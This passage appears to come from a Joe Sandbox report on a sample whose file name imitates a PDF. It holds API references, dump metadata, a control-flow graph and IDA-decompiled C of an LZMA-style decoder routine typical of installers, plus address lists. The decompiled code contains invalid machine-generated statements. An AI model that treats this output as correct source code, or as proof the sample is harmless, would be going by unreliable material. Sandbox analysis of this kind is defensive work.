                                                                      0x004065e2
                                                                      0x004065e9

                                                                      APIs
                                                                      • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406593
                                                                      • wsprintfW.USER32 ref: 004065CE
                                                                      • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004065E2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-1946221925
                                                                      • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                                      • Instruction ID: 5ba2db083709ae0eaf9cf6759a8f1877d4d75d4363d7664b3b34a8d65426c280
                                                                      • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                                      • Instruction Fuzzy Hash: 4AF0F670910219FADF10AB64EE0EF9B366CAB00304F50403AA546F11D0EB7CDA25CBA8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040672B Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 198COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 932 40672b-40674e 933 406750-406753 932->933 934 406758-40675b 932->934 935 407178-40717c 933->935 936 40675e-406767 934->936 937 407175 936->937 938 40676d 936->938 937->935 939 406774-406778 938->939 940 4068b4-406f5b 938->940 941 406819-40681d 938->941 942 406889-40688d 938->942 946 407160-407173 939->946 947 40677e-40678b 939->947 952 406f75-406f8b 940->952 953 406f5d-406f73 940->953 944 406823-40683c 941->944 945 4070c9-4070d3 941->945 948 406893-4068a7 942->948 949 4070d8-4070e2 942->949 951 40683f-406843 944->951 945->946 946->935 947->937 954 406791-4067d7 947->954 950 4068aa-4068b2 948->950 949->946 950->940 950->942 951->941 956 406845-40684b 951->956 955 406f8e-406f95 952->955 953->955 957 4067d9-4067dd 954->957 958 4067ff-406801 954->958 965 406f97-406f9b 955->965 966 406fbc-406fc8 955->966 963 406875-406887 956->963 964 40684d-406854 956->964 959 4067e8-4067f6 GlobalAlloc 957->959 960 4067df-4067e2 GlobalFree 957->960 961 406803-40680d 958->961 962 40680f-406817 958->962 959->937 968 4067fc 959->968 960->959 961->961 961->962 962->951 963->950 969 406856-406859 GlobalFree 964->969 970 40685f-40686f GlobalAlloc 964->970 971 406fa1-406fb9 965->971 972 40714a-407154 965->972 966->936 968->958 969->970 970->937 970->963 971->966 972->946
                                                                      C-Code - Quality: 98%
                                                                      			E0040672B(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M0040717D))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									__ebx = __edx + 1;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__ebx = __edx + 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                                                                      0x0040673b
                                                                      0x00406742
                                                                      0x00406748
                                                                      0x0040674e
                                                                      0x00000000
                                                                      0x00406752
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x0040675e
                                                                      0x00406767
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00000000
                                                                      0x00406774
                                                                      0x00406778
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406781
                                                                      0x00406784
                                                                      0x00406787
                                                                      0x00406789
                                                                      0x0040678b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406791
                                                                      0x00406794
                                                                      0x00406796
                                                                      0x00406797
                                                                      0x0040679a
                                                                      0x0040679c
                                                                      0x0040679d
                                                                      0x0040679f
                                                                      0x004067a2
                                                                      0x004067a7
                                                                      0x004067ac
                                                                      0x004067b5
                                                                      0x004067c8
                                                                      0x004067cb
                                                                      0x004067d4
                                                                      0x004067d7
                                                                      0x004067ff
                                                                      0x004067ff
                                                                      0x00406801
                                                                      0x0040680f
                                                                      0x0040680f
                                                                      0x00406813
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x00406803
                                                                      0x00406806
                                                                      0x00406806
                                                                      0x00406807
                                                                      0x00406807
                                                                      0x00000000
                                                                      0x00406803
                                                                      0x004067d9
                                                                      0x004067dd
                                                                      0x004067e2
                                                                      0x004067e2
                                                                      0x004067eb
                                                                      0x004067f1
                                                                      0x004067f3
                                                                      0x004067f6
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x004067fc
                                                                      0x00000000
                                                                      0x00406819
                                                                      0x00406819
                                                                      0x0040681d
                                                                      0x004070c9
                                                                      0x00000000
                                                                      0x004070c9
                                                                      0x00406826
